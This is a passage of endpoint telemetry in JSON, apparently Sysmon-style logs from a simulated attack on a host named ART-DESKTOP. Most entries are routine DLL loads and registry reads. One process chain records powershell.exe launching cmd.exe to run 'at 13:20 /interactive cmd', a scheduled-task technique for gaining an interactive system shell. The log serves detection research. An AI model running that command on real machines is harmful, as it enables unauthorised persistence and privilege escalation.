"event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System", - "registry_path": "HKLM\\System\\CurrentControlSet", - "registry_value": "CurrentControlSet", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System", - "registry_path": "HKLM\\System\\CurrentControlSet", - "registry_value": "CurrentControlSet", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\Interfaces", - "registry_value": "Interfaces", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", - "registry_value": "0001", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", - "registry_value": "0001", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", - "registry_value": "0000", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", - "registry_value": "0000", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", - "registry_value": "0001", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", - "registry_value": "0000", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "ImplatSetup.dll", - "image_path": "C:\\Windows\\System32\\ImplatSetup.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupEngine.dll", - "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System", - "registry_path": "HKLM\\System\\CurrentControlSet", - "registry_value": "CurrentControlSet", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System", - "registry_path": "HKLM\\System\\CurrentControlSet", - "registry_value": "CurrentControlSet", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "ImplatSetup.dll", - "image_path": "C:\\Windows\\System32\\ImplatSetup.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\Interfaces", - "registry_value": "Interfaces", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", - "registry_value": "0000", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", - "registry_value": "0001", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7672, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573803250000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573803230000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "command_line": "at 13:20 /interactive cmd", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5964, - "ppid": 7672, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "subtype": "create", - "timestamp": 131883573803349984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}", - "unique_ppid": "{42FC7E13-CC04-5C05-0000-001082DF5601}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 